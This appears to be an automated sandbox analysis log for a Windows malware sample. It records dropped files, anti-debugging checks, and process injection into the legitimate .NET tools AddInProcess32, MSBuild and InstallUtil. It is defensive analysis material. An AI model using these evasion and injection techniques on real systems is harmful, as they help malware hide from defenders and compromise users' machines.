Source: C:\Users\user\Desktop\pKxhpP0spW.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\api-ms-win-crt-string-l1-1-0.dll
Source: C:\Users\user\Desktop\pKxhpP0spW.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\api-ms-win-crt-private-l1-1-0.dll
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe Dropped PE file which has not been started: C:\Users\user\SystemRootDoc\api-ms-win-crt-process-l1-1-0.dll
Source: C:\Users\user\Desktop\pKxhpP0spW.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\api-ms-win-crt-locale-l1-1-0.dll
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe Dropped PE file which has not been started: C:\Users\user\SystemRootDoc\api-ms-win-crt-utility-l1-1-0.dll
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe Dropped PE file which has not been started: C:\Users\user\SystemRootDoc\api-ms-win-crt-convert-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe Dropped PE file which has not been started: C:\Users\user\SystemRootDoc\vcomp140.dll Jump to dropped file
Source: C:\Users\user\Desktop\pKxhpP0spW.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\api-ms-win-crt-convert-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\pKxhpP0spW.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\msvcp140_atomic_wait.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe Dropped PE file which has not been started: C:\Users\user\SystemRootDoc\concrt140.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe Dropped PE file which has not been started: C:\Users\user\SystemRootDoc\api-ms-win-crt-private-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe Dropped PE file which has not been started: C:\Users\user\SystemRootDoc\msvcp140_2.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe Dropped PE file which has not been started: C:\Users\user\SystemRootDoc\msvcp140_atomic_wait.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe Dropped PE file which has not been started: C:\Users\user\SystemRootDoc\api-ms-win-crt-multibyte-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe Dropped PE file which has not been started: C:\Users\user\SystemRootDoc\api-ms-win-crt-locale-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\pKxhpP0spW.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\concrt140.dll Jump to dropped file
Source: C:\Users\user\Desktop\pKxhpP0spW.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\msvcp140_1.dll Jump to dropped file
Source: C:\Users\user\Desktop\pKxhpP0spW.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\api-ms-win-crt-math-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\pKxhpP0spW.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\api-ms-win-crt-multibyte-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\pKxhpP0spW.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\api-ms-win-crt-stdio-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\pKxhpP0spW.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\api-ms-win-crt-filesystem-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\pKxhpP0spW.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\api-ms-win-crt-environment-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\pKxhpP0spW.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\api-ms-win-crt-conio-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\pKxhpP0spW.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\msvcp140_codecvt_ids.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe Dropped PE file which has not been started: C:\Users\user\SystemRootDoc\api-ms-win-crt-time-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe API coverage: 4.1 %
Source: C:\Users\user\SystemRootDoc\motor1.exe API coverage: 5.9 %
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 1912 Thread sleep count: 38 > 30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 1912 Thread sleep time: -35048813740048126s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 5948 Thread sleep count: 5235 > 30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 5948 Thread sleep count: 4537 > 30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 420 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 5588 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 5824 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 5936 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 3928 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 2740 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7028 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6136 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 1832 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 1436 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 420 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 1764 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 3404 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 1944 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 352 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2032 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\SystemRootDoc\motor1.exe Last function: Thread delayed
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 922337203685477
Source: motor1.exe, 00000004.00000002.2544278781.00007FFD94758000.00000002.00000001.01000000.00000007.sdmp, motor1.exe, 00000015.00000002.2601305286.00007FFD928E8000.00000002.00000001.01000000.0000002C.sdmp Binary or memory string: qEMutating a value collection derived from a dictionary is not allowed.Y
Source: motor1.exe, 00000004.00000002.2539797410.0000022D5F50C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllt,
Source: pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: lgnW2/4/PEZB31jiVg88O8EckzXZOFKs7sjsLjBOlDW0JB9LeGna8gI4zJVSk/BwJVmcIGfE
Source: AddInProcess32.exe, 00000005.00000002.4838057286.0000000000AF7000.00000004.00000020.00020000.00000000.sdmp, motor1.exe, 00000015.00000002.2598521100.000002144CE8C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Process information queried: ProcessInformation

Anti Debugging

Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe Code function: 4_2_00007FFD93B71380 4_2_00007FFD93B71380
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe Code function: 4_2_00007FFD93B71330 4_2_00007FFD93B71330
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe Code function: 4_2_00007FFD93E61380 4_2_00007FFD93E61380
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe Code function: 4_2_00007FFD93E61330 4_2_00007FFD93E61330
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe Code function: 4_2_00007FFD94261330 4_2_00007FFD94261330
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe Code function: 4_2_00007FFD94261380 4_2_00007FFD94261380
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe Process queried: DebugPort
Source: C:\Users\user\SystemRootDoc\motor1.exe Process queried: DebugPort
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe Code function: 4_2_00007FFD93B71380 rdtsc 4_2_00007FFD93B71380
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe Code function: 4_2_00007FFDA384A990 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 4_2_00007FFDA384A990
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Process token adjusted: Debug
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process token adjusted: Debug
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe Code function: 4_2_00007FFD93D793A0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 4_2_00007FFD93D793A0
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe Code function: 4_2_00007FFD944DD978 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 4_2_00007FFD944DD978
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe Code function: 4_2_00007FFDA384A5DC SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 4_2_00007FFDA384A5DC
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe Code function: 4_2_00007FFDA384AB78 SetUnhandledExceptionFilter, 4_2_00007FFDA384AB78
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe Code function: 4_2_00007FFDA384A990 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 4_2_00007FFDA384A990
Source: C:\Users\user\SystemRootDoc\motor1.exe Code function: 21_2_00007FFD9B1BBAC0 SetUnhandledExceptionFilter, 21_2_00007FFD9B1BBAC0
Source: C:\Users\user\SystemRootDoc\motor1.exe Code function: 21_2_00007FFD9B1BBB30 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 21_2_00007FFD9B1BBB30
Source: C:\Users\user\SystemRootDoc\motor1.exe Code function: 21_2_00007FFD9B1BB8D8 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 21_2_00007FFD9B1BB8D8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion

Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 400000 protect: page execute and read and write
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 protect: page execute and read and write
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000 protect: page execute and read and write
Source: C:\Users\user\SystemRootDoc\motor1.exe Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 400000 protect: page execute and read and write
Source: C:\Users\user\SystemRootDoc\motor1.exe Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000 protect: page execute and read and write
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\SystemRootDoc\motor1.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\SystemRootDoc\motor1.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 400000
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 402000
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 40C000
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 40E000
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 6A4008
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: C51008
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 732008
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: ABA008
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: CAE008
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 63E008
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 111C008
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 402000
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 40C000
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 40E000
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 683008
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 402000
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 40C000
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 40E000
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 899008
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 100A008
Source: C:\Users\user\SystemRootDoc\motor1.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 400000
Source: C:\Users\user\SystemRootDoc\motor1.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 402000
Source: C:\Users\user\SystemRootDoc\motor1.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 40C000
Source: C:\Users\user\SystemRootDoc\motor1.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 40E000
Source: C:\Users\user\SystemRootDoc\motor1.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: D1E008
Source: C:\Users\user\SystemRootDoc\motor1.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000
Source: C:\Users\user\SystemRootDoc\motor1.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 402000
Source: C:\Users\user\SystemRootDoc\motor1.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 40C000
Source: C:\Users\user\SystemRootDoc\motor1.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 40E000
Source: C:\Users\user\SystemRootDoc\motor1.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: C8B008
Source: C:\Users\user\SystemRootDoc\motor1.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: B26008
Source: C:\Users\user\SystemRootDoc\motor1.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 227008
Source: C:\Users\user\SystemRootDoc\motor1.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: DFA008
Source: C:\Users\user\SystemRootDoc\motor1.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: F2D008
Source: C:\Users\user\SystemRootDoc\motor1.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 27C008
Source: C:\Users\user\SystemRootDoc\motor1.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: B88008
Source: C:\Users\user\SystemRootDoc\motor1.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 24A008
Source: C:\Users\user\SystemRootDoc\motor1.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: AC3008
Source: C:\Users\user\Desktop\pKxhpP0spW.exe Process created: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe"
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\SystemRootDoc\motor1.exe "C:\Users\user\SystemRootDoc\motor1.exe"
Source: C:\Users\user\SystemRootDoc\motor1.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
Source: C:\Users\user\SystemRootDoc\motor1.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe"
Source: conhost.exe, 00000002.00000002.4838867884.0000021A31350000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: IProgram Manager
Source: motor1.exe, 00000004.00000002.2541006692.0000022D65C00000.00000004.00001000.00020000.00000000.sdmp, motor1.exe, 00000004.00000002.2540642308.0000022D6382C000.00000004.00001000.00020000.00000000.sdmp, motor1.exe, 00000015.00000002.2599478044.000002145142C000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: Progmanh
Source: conhost.exe, 00000002.00000002.4838867884.0000021A31350000.00000002.00000001.00040000.00000000.sdmp, motor1.exe, 00000004.00000002.2541006692.0000022D65C00000.00000004.00001000.00020000.00000000.sdmp, motor1.exe, 00000004.00000002.2540642308.0000022D6382C000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: Shell_TrayWnd
Source: conhost.exe, 00000002.00000002.4838867884.0000021A31350000.00000002.00000001.00040000.00000000.sdmp, motor1.exe, 00000004.00000002.2541006692.0000022D65C00000.00000004.00001000.00020000.00000000.sdmp, motor1.exe, 00000004.00000002.2540642308.0000022D6382C000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: Progman
Source: conhost.exe, 00000002.00000002.4838867884.0000021A31350000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progmanlock
Source: motor1.exe, 00000004.00000002.2541006692.0000022D65C00000.00000004.00001000.00020000.00000000.sdmp, motor1.exe, 00000004.00000002.2540642308.0000022D6382C000.00000004.00001000.00020000.00000000.sdmp, motor1.exe, 00000015.00000002.2599478044.000002145142C000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: Shell_TrayWndh
Source: C:\Users\user\Desktop\pKxhpP0spW.exe Queries volume information: C:\Users\user\Desktop\pKxhpP0spW.exe VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe Code function: 4_2_00007FF7EDCFB8DC GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter, 4_2_00007FF7EDCFB8DC
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe Code function: 4_2_00007FFDA3845EC0 GetUserNameW,GetLastError,GetUserNameW,_invalid_parameter_noinfo_noreturn, 4_2_00007FFDA3845EC0
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: AddInProcess32.exe, 00000005.00000002.4838057286.0000000000BAC000.00000004.00000020.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.4844668204.0000000005E92000.00000004.00000020.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.4838057286.0000000000B7D000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
